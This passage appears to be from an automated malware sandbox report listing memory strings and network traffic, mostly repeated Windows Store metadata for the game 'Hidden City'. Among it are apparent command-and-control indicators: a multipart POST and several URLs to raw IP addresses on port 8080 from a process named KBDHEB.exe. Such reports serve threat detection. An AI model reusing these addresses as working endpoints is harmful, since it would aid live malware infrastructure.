"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                      Source: unknownHTTP traffic detected: POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/Content-Type: multipart/form-data; boundary=---------------------------270479976396707User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.106.139.101:8080Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpString found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmpString found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.10A
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://87.10AA
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in